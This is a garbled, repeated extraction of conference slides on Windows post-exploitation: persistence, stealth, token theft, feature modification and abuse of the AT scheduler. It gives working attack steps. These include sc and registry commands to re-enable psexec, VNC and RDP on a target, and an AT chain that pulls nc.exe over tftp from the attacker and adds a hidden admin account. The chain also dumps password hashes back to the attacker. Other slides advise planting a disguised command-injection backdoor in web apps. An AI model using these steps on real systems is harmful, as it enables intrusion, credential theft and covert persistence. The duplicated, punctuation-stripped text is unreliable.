ndash Change Identitybull Hijack credentialssessionsbull Abuse tokens
ndash Access is the end goal be it data or another system
Slide 42
User Identity Theft
bull Existing toolsndash Incognito (metasploit)
bull Enumerate hijack tokensndash FUFUTO
bull Enable SYSTEM privilegesbull Change process privileges DKOM
ndash SU SUDO KSUndash Process injectionndash Hijack domain credentials
Slide 43
User Identity Theft
Tokens Privileges Security Descriptors SIDrsquos SACLrsquos DACLrsquos ACErsquos Ohrsquo My
bull What we wantndash Privileges or SIDrsquos
bull What we getndash Access Access Access
bull How we get itndash Incognito vs FUto
Slide 44
bull DEMOS
Slide 45
Feature Modification
Slide 46
Feature Modification
bull Changing existing features or settings to benefit our activities
bull Goalsndash Support all Post-Exploitation activitiesndash Disabling detection technologiesndash Enabling in-secure or easy to use access
software
Slide 47
Feature Modification
bull Feature Modification is Basically Securable Object Manipulationndash Remember all those Tokens and Security Descriptorsndash These can be modified programmatically and directly
bull Not just through existing toolsndash Stealth Persistence requirements
bull May make it more advantageous to use custom toolsndash Access Objects programmaticallyndash Can be much more complex to implement
Slide 48
Feature Modification
bull Re-enabling disabled accessndash PsExec Itrsquos still cool (Thanks Mark)
bull Enabling GUI accessndash VNC (from a command line)ndash Remote Desktop (even if disabled)
bull Turning off or adding exceptions to security softwarendash Firewalls AV logging
bull Modifying Local Security Policies
Slide 49
Feature Modification
bull Enabling psexecndash Psexec was great awesome remote
shellcommand toolndash Everybody now disables clipbook which
psexec requires l4m3 ndash Lets re-enable it
Slide 50
Feature Modification
bull Enabling psexecbull Use the system control tool scexe
ndash Net use targetipc$ username userpasswordndash Sc target config netdde start= autondash Sc target config netddedsdm start= autondash Sc target config clipsrv start= autondash Sc target start netddendash Sc target start netddedsdmndash Sc target start clipserv
Slide 51
Feature Modification bull Enabling VNC (from command line)
ndash Go get VNC (check out guhnu)ndash Make a folder on the target for the vnc filesndash Copy the following files to target folder
bull Winvncexebull Vncregbull Vnchooksdllbull Omnithread_rtdll
ndash Regedit ndashs vncregndash Winvnc ndashinstallndash Net start ldquovnc serverrdquondash Winvncndash Password is ldquoinfectedrdquo
Vncreg file contents
[HKEY_LOCAL_MACHINESOFTWAREORLWinVNC3Default]SocketConnect=dword00000001AutoPortSelect=dword00000001InputsEnabled=dword00000001LocalInputsDisabled=dword00000000IdleTimeout=dword00000000QuerySetting=dword00000002QueryTimeout=dword0000000aPollUnderCursor=dword00000000PollForeground=dword00000001PollFullScreen=dword00000000OnlyPollConsole=dword00000001OnlyPollOnEvent=dword00000000Password=hex104d893d5ae155f8
Slide 52
Feature Modification
bull Enabling Remote Desktop remotelyndash Having a GUI to your target can be necessary ndash Maybe they are running a specialized GUI app
bull Ex System controlling access to security doorsndash No command line way of modifying system need GUI
bull SCADA systemsbull Security camerasbull Who knows what you might be up to
ndash Remote desktop is fast and already a feature of OSndash However itrsquos often disabled maybe even by GPO
Slide 53
Feature Modification bull Enabling Remote Desktop remotely
ndash Complicated procedure especially if GPOrsquos involved ndash Create a file named fix_ts_policyini
[Unicode]Unicode=yes[Version]signature=$CHICAGO$Revision=1[Privilege Rights]seremoteinteractivelogonright = hacked_accountseinteractivelogonright = hacked_accountsedenyinteractivelogonright =sedenyremoteinteractivelogonright =sedenynetworklogonright =
ndash This file will fix policy settings in your wayndash Change ldquohacked_accountrdquo to a real account
Slide 54
Feature Modification bull Enabling Remote Desktop remotely
ndash Create another file named enable_tsregWindows Registry Editor Version 500
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server]
fDenyTSConnections=dword00000000TSEnabled=dword00000001TSUserEnabled=dword00000000
ndash Then perform these commandsbull sc config termservice start= autobull regedit s enable_tsregbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabasenewseceditsdbbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabaseorigseceditsdbbull secedit configure db newseceditsdb cfg fix_ts_policyinibull gpupdate Forcebull net start terminal services
Slide 55
bull DEMOS
Slide 56
Abusing The Scheduler
Slide 57
Abusing The Scheduler
bull Oldschool techniques can get results on new problems
bull Remember this is POST exploitation so you already have some access
bull AT command schedules things to run on at a specified time and date
ndash Schedule service must be running
Slide 58
Abusing The Scheduler
bull Often these days certain features are disabled for security
ndash Clipbook shares enumerationbull Use AT to get around these problems
ndash Usually NOT disabled
Net use targetipc$ password userusernameAt target 1200 pm commandEx At 19216811 1200pm tftp ndashI myip GET ncexe
Slide 59
Abusing The Scheduler
bull Often AT is still enabled while many other things you typically use are not
bull AT is as good as having a shellndash Enable Start Servicesndash Transfer filesndash Adding usersndash Messing with the registry policiesndash Pretty much anything you can do with a shellndash Added bonus defaults to run as SYSTEM
Slide 60
Abusing The Scheduler
bull Building a tool around AT ndash Flow
bull Establish authenticated sessionbull Determine the time on the targetbull Pass commands to the target to be run 1 min from now
ndash Write a batch file that executes everything at oncendash Have the target send you back whatever info you wantndash Be mindful of file transfer protocols TFTP is good but not
always ldquoquietrdquo or available
Slide 61
Abusing The Scheduler
bull Common use examplendash Net use targetndash Net time targetndash At target (net time +1min) ldquotftp ndashi use GET ebatrdquondash At target (net time +2min) ebatndash ebat does
bull Adds a user (net user hacked hacked add)ndash Admin group (net localgroup administrators hacked add)
bull Gets hashdumping tools and dumps hashesbull Sends hashes identified by IP back to attacker host
Slide 62
Abusing The Scheduler
bull Privileges of LocalSystem that we care aboutndash NT AUTHORITYSYSTEM and
BUILTINAdministrators SIDs ndash SE_IMPERSONATE_NAME ndash SE_TCB_NAME ndash SE_DEBUG_NAME
Slide 63
Massive Automation
Slide 64
Massive Automation
bull Automating techniques and tools for use against massive numbers of hosts
bull Goalsndash Penetrate as many systems as possible
with little interaction and in a short timendash Ease of use re-usendash Lower cost of attack
Slide 65
Massive Automation
bull MassNetUse ndash Establish netbios session credentials on range of hosts
bull MassWinenum ndash Enumerate Netbios information bypass certain RestrictAnonymous settings
bull AtAbuse ndash Use the scheduler as your ldquoshellrdquo to control ranges of hosts
Slide 66
bull DEMOS
Slide 67
bull Related talks you should seendash Beyond EIP ndash The theoretical tool
development end of things (spoonm amp skape)ndash Security Implications of Windows Access
Tokens (Luke Jennings)
Slide 68
bull Acknowledgementsndash Thanks to
bull All the people from offensivecomputing nologin uninformed IRC and SILC channels
bull HD Moore especially for support and mentorship bull Danny Quist krbklepto Egypt spoonm skape bull Luke Jennings for his awesome work
Slide 69
bull Questions bull Presentation available at
wwwoffensivecomputingnet
- Meta-Post Exploitation
- Slide 2
- Slide 3
- Slide 4
- Slide 5
- Slide 6
- Slide 7
- Slide 8
- Slide 9
- Slide 10
- Slide 11
- Slide 12
- Slide 13
- Slide 14
- Slide 15
- Slide 16
- Slide 17
- Slide 18
- Slide 19
- Slide 20
- Slide 21
- Slide 22
- Slide 23
- Slide 24
- Slide 25
- Slide 26
- Slide 27
- Slide 28
- Slide 29
- Slide 30
- Slide 31
- Slide 32
- Slide 33
- Slide 34
- Slide 35
- Slide 36
- Slide 37
- Slide 38
- Slide 39
- Slide 40
- Slide 41
- Slide 42
- Slide 43
- Slide 44
- Slide 45
- Slide 46
- Slide 47
- Slide 48
- Slide 49
- Slide 50
- Slide 51
- Slide 52
- Slide 53
- Slide 54
- Slide 55
- Slide 56
- Slide 57
- Slide 58
- Slide 59
- Slide 60
- Slide 61
- Slide 62
- Slide 63
- Slide 64
- Slide 65
- Slide 66
- Slide 67
- Slide 68
- Slide 69
-
Slide 17
Persistence
bull Persistence is maintaining accessbull Why
ndash Targetrsquos can get patchedndash Some exploits are 1 shot onlyndash Sometimes you need to return multiple times to the
targetndash Targetrsquos usefulness not always immediately known
bull Goals Access target as often as neededusefulbull Huge area of studybull Sometimes persistence doesnrsquot matter
Slide 18
Persistence
bull Stages of Persistencendash Initial access
bull Exploitbull Stolen password etc
ndash Decisions What tool to usebull FUZZY ndash OS Environment Target dependent
ndash Setup ndash Re-accessing of targetndash Cleanup Donrsquot be a slob it will get you caught
bull When you no longer need the target leave no trace
Slide 19
Persistence
bull Existing toolsndash Rootkitsndash Backdoorsndash Trojansndash Port knockersndash Adding accountsndash Things like netcat backdoors inetd
modifications process injection stealing credentials etc
Slide 20
Persistence
bull Different perspective on persistencendash If you can always re-exploit who caresndash Inject add modify new vulnerabilities
bull Hard to determine maliciousnessbull We all know its hard to find bugs now
imagine someone is purposefully putting the bugs in
Slide 21
Persistence
bull Leveraging existing persistent admin access
bull Nagios checksbull Attack Configuration Management
ndash Cfenginendash SMSndash Automated Patching Systems (ldquopatchrdquo
them with our trojans)bull GUIrsquos
bull Tool distribution
Slide 22
Persistence
bull Examplebull Machine has VNC installed bull Replace installed VNC with vulnerable version
ndash Authentication bypass bull Copy registry password so target doesnrsquot realizebull Persistence with no backdoors or rootkits to get
detected
Slide 23
Persistence
bull Add vulnerable codebull Example web apps
ndash Take out user input validationndash Inject your vulnerable code
bull Focus on vague intentbull Never be obviously and solely malicious
ndash Look for apps with previous vulnerabilitiesndash Re-introduce patched bugs
Slide 24
Persistence
bull More web app examplesbull Add hidden field to HTML form
ndash Users detect no change app performs normallyltinput type=ldquohiddenrdquo name=ldquoLangrdquogt
bull Edit web app and tie vuln perl code to form field input
If defined $hidden_field open($filenamerdquogt$hidden_field)
bull Craft a POST including the hidden field
Slide 25
Persistence
bull wwwtargetcomcgi-binappcgilang=|cmd| bull Code will execute your commandsbull Who needs to bind a shell to a portbull Unlikely to ever be detected
ndash Especially good in big appsndash Code review canrsquot even be sure of maliciousnessndash Some sites replace code every X time period
bull No rootkits to installbull Tripwire probably wonrsquot see this
Slide 26
Persistence
bull Take concept to another levelndash Add a decoder to web appndash Look for a ldquotriggerrdquo string combination in form
fieldsndash If Name = John Smith and Age = 42 then execute
contents of Address fieldndash URL encode form entries containing commandsndash Have identifier ldquostubrdquo in encoded data for app to
find
Slide 27
Persistence
bull Mixing Stealth with Persistencendash Further encodingndash Take entries from all fieldsndash Concat themndash ldquoDecoderdquo commandsndash Rotational Ciphers (rot 13 ceaser)ndash Even more complex obfuscation
Slide 28
Persistence
bull Covert Accountsndash Add an account renablendash Modify local account policies to allow access
bull Ex SUPPORT_3848576b1 guestndash Add it to the admin group (net localgroup)
bull Only use AT to run your commandsbull Persistence without adding files new accounts
ndash Unlikely to be discovered
Slide 29
bull DEMOS
Slide 30
Stealth Evading Detection
Slide 31
Stealth Evading Detection
bull Hiding your activityndash From
bull IDSbull AVbull LOGGINGbull Suspicious users amp adminsbull Firewallsbull Process listing
Slide 32
Stealth Evading Detection
bull Why Stealthndash If you get caught you get stoppedndash The longer you can operate undetected the more you
can accomplishndash Adminrsquos wonrsquot fix problems they donrsquot know exist
(helps persistence)ndash On a pen test you should also be testing the
organizations detection and response capabilities
Slide 33
Stealth Evading Detection
bull Goalsndash Keep system operable
bull If it breaks you canrsquot use itbull Someone will come fix it
ndash Operate without fear of detectionndash Robustness
bull Hiding shouldnrsquot require constant attentionndash DONrsquoT LOOK MALICIOUS
Slide 34
Stealth Evading Detection
bull Manual Existing Toolsndash Rootkits rootkits rootkitsndash Meterpreterndash Encryption
bull Shellcode Encoders for IDS evasionndash Log cleanersndash Packersndash Covert channels Steganographyndash Anti-analysis anti-forensics
bull See all of OCrsquos other talks bull Also Vinnie Liursquos Metasploit research
Slide 35
Stealth Evading Detection
bull Different Perspectivendash DONrsquoT BE AN ANOMALYndash Hide in plain sight
bull Many tools have ONLY malicious usesbull Make your intent hard to determine
ndash Be noisy on one to divert attention from another
Slide 36
Stealth Evading Detection
bull Different Perspectivendash Know the targets environment better than
they dobull If they donrsquot use encryption maybe you shouldnrsquot eitherbull Change strategies to match environments normal
behavior
ndash Donrsquot always default to exploitsbull See Tactical Exploitation talkbull IDSrsquos canrsquot see normal behavior that is malicious
Slide 37
Stealth Evading Detection
bull Using Windows security objects for stealthndash Auditing of Securable Objects is controlled by SACLrsquosndash Null SACL = No Auditing = No Logs
Slide 38
bull DEMOSndash Kaspersky squeals like a pig
Slide 39
User Identity Theft
Slide 40
User Identity Theft
bull Itrsquos not always about ROOTbull Look like someone else
ndash Use the credentials access of another userbull Goals
ndash Change your identity at willbull User ID domain credentials sessionsbull Impersonate system accountsbull Make activities look like normal user behavior
Slide 41
User Identity Theft
bull Stages and techniquesndash Target users
bull Who has access to whatbull Where is the data
ndash Change Identitybull Hijack credentialssessionsbull Abuse tokens
ndash Access is the end goal be it data or another system
Slide 42
User Identity Theft
bull Existing toolsndash Incognito (metasploit)
bull Enumerate hijack tokensndash FUFUTO
bull Enable SYSTEM privilegesbull Change process privileges DKOM
ndash SU SUDO KSUndash Process injectionndash Hijack domain credentials
Slide 43
User Identity Theft
Tokens Privileges Security Descriptors SIDrsquos SACLrsquos DACLrsquos ACErsquos Ohrsquo My
bull What we wantndash Privileges or SIDrsquos
bull What we getndash Access Access Access
bull How we get itndash Incognito vs FUto
Slide 44
bull DEMOS
Slide 45
Feature Modification
Slide 46
Feature Modification
bull Changing existing features or settings to benefit our activities
bull Goalsndash Support all Post-Exploitation activitiesndash Disabling detection technologiesndash Enabling in-secure or easy to use access
software
Slide 47
Feature Modification
bull Feature Modification is Basically Securable Object Manipulationndash Remember all those Tokens and Security Descriptorsndash These can be modified programmatically and directly
bull Not just through existing toolsndash Stealth Persistence requirements
bull May make it more advantageous to use custom toolsndash Access Objects programmaticallyndash Can be much more complex to implement
Slide 48
Feature Modification
bull Re-enabling disabled accessndash PsExec Itrsquos still cool (Thanks Mark)
bull Enabling GUI accessndash VNC (from a command line)ndash Remote Desktop (even if disabled)
bull Turning off or adding exceptions to security softwarendash Firewalls AV logging
bull Modifying Local Security Policies
Slide 49
Feature Modification
bull Enabling psexecndash Psexec was great awesome remote
shellcommand toolndash Everybody now disables clipbook which
psexec requires l4m3 ndash Lets re-enable it
Slide 50
Feature Modification
bull Enabling psexecbull Use the system control tool scexe
ndash Net use targetipc$ username userpasswordndash Sc target config netdde start= autondash Sc target config netddedsdm start= autondash Sc target config clipsrv start= autondash Sc target start netddendash Sc target start netddedsdmndash Sc target start clipserv
Slide 51
Feature Modification bull Enabling VNC (from command line)
ndash Go get VNC (check out guhnu)ndash Make a folder on the target for the vnc filesndash Copy the following files to target folder
bull Winvncexebull Vncregbull Vnchooksdllbull Omnithread_rtdll
ndash Regedit ndashs vncregndash Winvnc ndashinstallndash Net start ldquovnc serverrdquondash Winvncndash Password is ldquoinfectedrdquo
Vncreg file contents
[HKEY_LOCAL_MACHINESOFTWAREORLWinVNC3Default]SocketConnect=dword00000001AutoPortSelect=dword00000001InputsEnabled=dword00000001LocalInputsDisabled=dword00000000IdleTimeout=dword00000000QuerySetting=dword00000002QueryTimeout=dword0000000aPollUnderCursor=dword00000000PollForeground=dword00000001PollFullScreen=dword00000000OnlyPollConsole=dword00000001OnlyPollOnEvent=dword00000000Password=hex104d893d5ae155f8
Slide 52
Feature Modification
bull Enabling Remote Desktop remotelyndash Having a GUI to your target can be necessary ndash Maybe they are running a specialized GUI app
bull Ex System controlling access to security doorsndash No command line way of modifying system need GUI
bull SCADA systemsbull Security camerasbull Who knows what you might be up to
ndash Remote desktop is fast and already a feature of OSndash However itrsquos often disabled maybe even by GPO
Slide 53
Feature Modification bull Enabling Remote Desktop remotely
ndash Complicated procedure especially if GPOrsquos involved ndash Create a file named fix_ts_policyini
[Unicode]Unicode=yes[Version]signature=$CHICAGO$Revision=1[Privilege Rights]seremoteinteractivelogonright = hacked_accountseinteractivelogonright = hacked_accountsedenyinteractivelogonright =sedenyremoteinteractivelogonright =sedenynetworklogonright =
ndash This file will fix policy settings in your wayndash Change ldquohacked_accountrdquo to a real account
Slide 54
Feature Modification bull Enabling Remote Desktop remotely
ndash Create another file named enable_tsregWindows Registry Editor Version 500
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server]
fDenyTSConnections=dword00000000TSEnabled=dword00000001TSUserEnabled=dword00000000
ndash Then perform these commandsbull sc config termservice start= autobull regedit s enable_tsregbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabasenewseceditsdbbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabaseorigseceditsdbbull secedit configure db newseceditsdb cfg fix_ts_policyinibull gpupdate Forcebull net start terminal services
Slide 55
bull DEMOS
Slide 56
Abusing The Scheduler
Slide 57
Abusing The Scheduler
bull Oldschool techniques can get results on new problems
bull Remember this is POST exploitation so you already have some access
bull AT command schedules things to run on at a specified time and date
ndash Schedule service must be running
Slide 58
Abusing The Scheduler
bull Often these days certain features are disabled for security
ndash Clipbook shares enumerationbull Use AT to get around these problems
ndash Usually NOT disabled
Net use targetipc$ password userusernameAt target 1200 pm commandEx At 19216811 1200pm tftp ndashI myip GET ncexe
Slide 59
Abusing The Scheduler
bull Often AT is still enabled while many other things you typically use are not
bull AT is as good as having a shellndash Enable Start Servicesndash Transfer filesndash Adding usersndash Messing with the registry policiesndash Pretty much anything you can do with a shellndash Added bonus defaults to run as SYSTEM
Slide 60
Abusing The Scheduler
bull Building a tool around AT ndash Flow
bull Establish authenticated sessionbull Determine the time on the targetbull Pass commands to the target to be run 1 min from now
ndash Write a batch file that executes everything at oncendash Have the target send you back whatever info you wantndash Be mindful of file transfer protocols TFTP is good but not
always ldquoquietrdquo or available
Slide 61
Abusing The Scheduler
bull Common use examplendash Net use targetndash Net time targetndash At target (net time +1min) ldquotftp ndashi use GET ebatrdquondash At target (net time +2min) ebatndash ebat does
bull Adds a user (net user hacked hacked add)ndash Admin group (net localgroup administrators hacked add)
bull Gets hashdumping tools and dumps hashesbull Sends hashes identified by IP back to attacker host
Slide 62
Abusing The Scheduler
bull Privileges of LocalSystem that we care aboutndash NT AUTHORITYSYSTEM and
BUILTINAdministrators SIDs ndash SE_IMPERSONATE_NAME ndash SE_TCB_NAME ndash SE_DEBUG_NAME
Slide 63
Massive Automation
Slide 64
Massive Automation
bull Automating techniques and tools for use against massive numbers of hosts
bull Goalsndash Penetrate as many systems as possible
with little interaction and in a short timendash Ease of use re-usendash Lower cost of attack
Slide 65
Massive Automation
bull MassNetUse ndash Establish netbios session credentials on range of hosts
bull MassWinenum ndash Enumerate Netbios information bypass certain RestrictAnonymous settings
bull AtAbuse ndash Use the scheduler as your ldquoshellrdquo to control ranges of hosts
Slide 66
bull DEMOS
Slide 67
bull Related talks you should seendash Beyond EIP ndash The theoretical tool
development end of things (spoonm amp skape)ndash Security Implications of Windows Access
Tokens (Luke Jennings)
Slide 68
bull Acknowledgementsndash Thanks to
bull All the people from offensivecomputing nologin uninformed IRC and SILC channels
bull HD Moore especially for support and mentorship bull Danny Quist krbklepto Egypt spoonm skape bull Luke Jennings for his awesome work
Slide 69
bull Questions bull Presentation available at
wwwoffensivecomputingnet
- Meta-Post Exploitation
- Slide 2
- Slide 3
- Slide 4
- Slide 5
- Slide 6
- Slide 7
- Slide 8
- Slide 9
- Slide 10
- Slide 11
- Slide 12
- Slide 13
- Slide 14
- Slide 15
- Slide 16
- Slide 17
- Slide 18
- Slide 19
- Slide 20
- Slide 21
- Slide 22
- Slide 23
- Slide 24
- Slide 25
- Slide 26
- Slide 27
- Slide 28
- Slide 29
- Slide 30
- Slide 31
- Slide 32
- Slide 33
- Slide 34
- Slide 35
- Slide 36
- Slide 37
- Slide 38
- Slide 39
- Slide 40
- Slide 41
- Slide 42
- Slide 43
- Slide 44
- Slide 45
- Slide 46
- Slide 47
- Slide 48
- Slide 49
- Slide 50
- Slide 51
- Slide 52
- Slide 53
- Slide 54
- Slide 55
- Slide 56
- Slide 57
- Slide 58
- Slide 59
- Slide 60
- Slide 61
- Slide 62
- Slide 63
- Slide 64
- Slide 65
- Slide 66
- Slide 67
- Slide 68
- Slide 69
-
Slide 18
Persistence
bull Stages of Persistencendash Initial access
bull Exploitbull Stolen password etc
ndash Decisions What tool to usebull FUZZY ndash OS Environment Target dependent
ndash Setup ndash Re-accessing of targetndash Cleanup Donrsquot be a slob it will get you caught
bull When you no longer need the target leave no trace
Slide 19
Persistence
bull Existing toolsndash Rootkitsndash Backdoorsndash Trojansndash Port knockersndash Adding accountsndash Things like netcat backdoors inetd
modifications process injection stealing credentials etc
Slide 20
Persistence
bull Different perspective on persistencendash If you can always re-exploit who caresndash Inject add modify new vulnerabilities
bull Hard to determine maliciousnessbull We all know its hard to find bugs now
imagine someone is purposefully putting the bugs in
Slide 21
Persistence
bull Leveraging existing persistent admin access
bull Nagios checksbull Attack Configuration Management
ndash Cfenginendash SMSndash Automated Patching Systems (ldquopatchrdquo
them with our trojans)bull GUIrsquos
bull Tool distribution
Slide 22
Persistence
bull Examplebull Machine has VNC installed bull Replace installed VNC with vulnerable version
ndash Authentication bypass bull Copy registry password so target doesnrsquot realizebull Persistence with no backdoors or rootkits to get
detected
Slide 23
Persistence
bull Add vulnerable codebull Example web apps
ndash Take out user input validationndash Inject your vulnerable code
bull Focus on vague intentbull Never be obviously and solely malicious
ndash Look for apps with previous vulnerabilitiesndash Re-introduce patched bugs
Slide 24
Persistence
bull More web app examplesbull Add hidden field to HTML form
ndash Users detect no change app performs normallyltinput type=ldquohiddenrdquo name=ldquoLangrdquogt
bull Edit web app and tie vuln perl code to form field input
If defined $hidden_field open($filenamerdquogt$hidden_field)
bull Craft a POST including the hidden field
Slide 25
Persistence
bull wwwtargetcomcgi-binappcgilang=|cmd| bull Code will execute your commandsbull Who needs to bind a shell to a portbull Unlikely to ever be detected
ndash Especially good in big appsndash Code review canrsquot even be sure of maliciousnessndash Some sites replace code every X time period
bull No rootkits to installbull Tripwire probably wonrsquot see this
Slide 26
Persistence
bull Take concept to another levelndash Add a decoder to web appndash Look for a ldquotriggerrdquo string combination in form
fieldsndash If Name = John Smith and Age = 42 then execute
contents of Address fieldndash URL encode form entries containing commandsndash Have identifier ldquostubrdquo in encoded data for app to
find
Slide 27
Persistence
bull Mixing Stealth with Persistencendash Further encodingndash Take entries from all fieldsndash Concat themndash ldquoDecoderdquo commandsndash Rotational Ciphers (rot 13 ceaser)ndash Even more complex obfuscation
Slide 28
Persistence
bull Covert Accountsndash Add an account renablendash Modify local account policies to allow access
bull Ex SUPPORT_3848576b1 guestndash Add it to the admin group (net localgroup)
bull Only use AT to run your commandsbull Persistence without adding files new accounts
ndash Unlikely to be discovered
Slide 29
bull DEMOS
Slide 30
Stealth Evading Detection
Slide 31
Stealth Evading Detection
bull Hiding your activityndash From
bull IDSbull AVbull LOGGINGbull Suspicious users amp adminsbull Firewallsbull Process listing
Slide 32
Stealth Evading Detection
bull Why Stealthndash If you get caught you get stoppedndash The longer you can operate undetected the more you
can accomplishndash Adminrsquos wonrsquot fix problems they donrsquot know exist
(helps persistence)ndash On a pen test you should also be testing the
organizations detection and response capabilities
Slide 33
Stealth Evading Detection
bull Goalsndash Keep system operable
bull If it breaks you canrsquot use itbull Someone will come fix it
ndash Operate without fear of detectionndash Robustness
bull Hiding shouldnrsquot require constant attentionndash DONrsquoT LOOK MALICIOUS
Slide 34
Stealth Evading Detection
bull Manual Existing Toolsndash Rootkits rootkits rootkitsndash Meterpreterndash Encryption
bull Shellcode Encoders for IDS evasionndash Log cleanersndash Packersndash Covert channels Steganographyndash Anti-analysis anti-forensics
bull See all of OCrsquos other talks bull Also Vinnie Liursquos Metasploit research
Slide 35
Stealth Evading Detection
bull Different Perspectivendash DONrsquoT BE AN ANOMALYndash Hide in plain sight
bull Many tools have ONLY malicious usesbull Make your intent hard to determine
ndash Be noisy on one to divert attention from another
Slide 36
Stealth Evading Detection
bull Different Perspectivendash Know the targets environment better than
they dobull If they donrsquot use encryption maybe you shouldnrsquot eitherbull Change strategies to match environments normal
behavior
ndash Donrsquot always default to exploitsbull See Tactical Exploitation talkbull IDSrsquos canrsquot see normal behavior that is malicious
Slide 37
Stealth Evading Detection
bull Using Windows security objects for stealthndash Auditing of Securable Objects is controlled by SACLrsquosndash Null SACL = No Auditing = No Logs
Slide 38
bull DEMOSndash Kaspersky squeals like a pig
Slide 39
User Identity Theft
Slide 40
User Identity Theft
bull Itrsquos not always about ROOTbull Look like someone else
ndash Use the credentials access of another userbull Goals
ndash Change your identity at willbull User ID domain credentials sessionsbull Impersonate system accountsbull Make activities look like normal user behavior
Slide 41
User Identity Theft
bull Stages and techniquesndash Target users
bull Who has access to whatbull Where is the data
ndash Change Identitybull Hijack credentialssessionsbull Abuse tokens
ndash Access is the end goal be it data or another system
Slide 42
User Identity Theft
bull Existing toolsndash Incognito (metasploit)
bull Enumerate hijack tokensndash FUFUTO
bull Enable SYSTEM privilegesbull Change process privileges DKOM
ndash SU SUDO KSUndash Process injectionndash Hijack domain credentials
Slide 43
User Identity Theft
Tokens Privileges Security Descriptors SIDrsquos SACLrsquos DACLrsquos ACErsquos Ohrsquo My
bull What we wantndash Privileges or SIDrsquos
bull What we getndash Access Access Access
bull How we get itndash Incognito vs FUto
Slide 44
bull DEMOS
Slide 45
Feature Modification
Slide 46
Feature Modification
bull Changing existing features or settings to benefit our activities
bull Goalsndash Support all Post-Exploitation activitiesndash Disabling detection technologiesndash Enabling in-secure or easy to use access
software
Slide 47
Feature Modification
bull Feature Modification is Basically Securable Object Manipulationndash Remember all those Tokens and Security Descriptorsndash These can be modified programmatically and directly
bull Not just through existing toolsndash Stealth Persistence requirements
bull May make it more advantageous to use custom toolsndash Access Objects programmaticallyndash Can be much more complex to implement
Slide 48
Feature Modification
bull Re-enabling disabled accessndash PsExec Itrsquos still cool (Thanks Mark)
bull Enabling GUI accessndash VNC (from a command line)ndash Remote Desktop (even if disabled)
bull Turning off or adding exceptions to security softwarendash Firewalls AV logging
bull Modifying Local Security Policies
Slide 49
Feature Modification
bull Enabling psexecndash Psexec was great awesome remote
shellcommand toolndash Everybody now disables clipbook which
psexec requires l4m3 ndash Lets re-enable it
Slide 50
Feature Modification
bull Enabling psexecbull Use the system control tool scexe
ndash Net use targetipc$ username userpasswordndash Sc target config netdde start= autondash Sc target config netddedsdm start= autondash Sc target config clipsrv start= autondash Sc target start netddendash Sc target start netddedsdmndash Sc target start clipserv
Slide 51
Feature Modification bull Enabling VNC (from command line)
ndash Go get VNC (check out guhnu)ndash Make a folder on the target for the vnc filesndash Copy the following files to target folder
bull Winvncexebull Vncregbull Vnchooksdllbull Omnithread_rtdll
ndash Regedit ndashs vncregndash Winvnc ndashinstallndash Net start ldquovnc serverrdquondash Winvncndash Password is ldquoinfectedrdquo
Vncreg file contents
[HKEY_LOCAL_MACHINESOFTWAREORLWinVNC3Default]SocketConnect=dword00000001AutoPortSelect=dword00000001InputsEnabled=dword00000001LocalInputsDisabled=dword00000000IdleTimeout=dword00000000QuerySetting=dword00000002QueryTimeout=dword0000000aPollUnderCursor=dword00000000PollForeground=dword00000001PollFullScreen=dword00000000OnlyPollConsole=dword00000001OnlyPollOnEvent=dword00000000Password=hex104d893d5ae155f8
Slide 52
Feature Modification
bull Enabling Remote Desktop remotelyndash Having a GUI to your target can be necessary ndash Maybe they are running a specialized GUI app
bull Ex System controlling access to security doorsndash No command line way of modifying system need GUI
bull SCADA systemsbull Security camerasbull Who knows what you might be up to
ndash Remote desktop is fast and already a feature of OSndash However itrsquos often disabled maybe even by GPO
Slide 53
Feature Modification bull Enabling Remote Desktop remotely
ndash Complicated procedure especially if GPOrsquos involved ndash Create a file named fix_ts_policyini
[Unicode]Unicode=yes[Version]signature=$CHICAGO$Revision=1[Privilege Rights]seremoteinteractivelogonright = hacked_accountseinteractivelogonright = hacked_accountsedenyinteractivelogonright =sedenyremoteinteractivelogonright =sedenynetworklogonright =
ndash This file will fix policy settings in your wayndash Change ldquohacked_accountrdquo to a real account
Slide 54
Feature Modification bull Enabling Remote Desktop remotely
ndash Create another file named enable_tsregWindows Registry Editor Version 500
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server]
fDenyTSConnections=dword00000000TSEnabled=dword00000001TSUserEnabled=dword00000000
ndash Then perform these commandsbull sc config termservice start= autobull regedit s enable_tsregbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabasenewseceditsdbbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabaseorigseceditsdbbull secedit configure db newseceditsdb cfg fix_ts_policyinibull gpupdate Forcebull net start terminal services
Slide 55
bull DEMOS
Slide 56
Abusing The Scheduler
Slide 57
Abusing The Scheduler
bull Oldschool techniques can get results on new problems
bull Remember this is POST exploitation so you already have some access
bull AT command schedules things to run on at a specified time and date
ndash Schedule service must be running
Slide 58
Abusing The Scheduler
bull Often these days certain features are disabled for security
ndash Clipbook shares enumerationbull Use AT to get around these problems
ndash Usually NOT disabled
Net use targetipc$ password userusernameAt target 1200 pm commandEx At 19216811 1200pm tftp ndashI myip GET ncexe
Slide 59
Abusing The Scheduler
bull Often AT is still enabled while many other things you typically use are not
bull AT is as good as having a shellndash Enable Start Servicesndash Transfer filesndash Adding usersndash Messing with the registry policiesndash Pretty much anything you can do with a shellndash Added bonus defaults to run as SYSTEM
Slide 60
Abusing The Scheduler
bull Building a tool around AT ndash Flow
bull Establish authenticated sessionbull Determine the time on the targetbull Pass commands to the target to be run 1 min from now
ndash Write a batch file that executes everything at oncendash Have the target send you back whatever info you wantndash Be mindful of file transfer protocols TFTP is good but not
always ldquoquietrdquo or available
Slide 61
Abusing The Scheduler
bull Common use examplendash Net use targetndash Net time targetndash At target (net time +1min) ldquotftp ndashi use GET ebatrdquondash At target (net time +2min) ebatndash ebat does
bull Adds a user (net user hacked hacked add)ndash Admin group (net localgroup administrators hacked add)
bull Gets hashdumping tools and dumps hashesbull Sends hashes identified by IP back to attacker host
Slide 62
Abusing The Scheduler
bull Privileges of LocalSystem that we care aboutndash NT AUTHORITYSYSTEM and
BUILTINAdministrators SIDs ndash SE_IMPERSONATE_NAME ndash SE_TCB_NAME ndash SE_DEBUG_NAME
Slide 63
Massive Automation
Slide 64
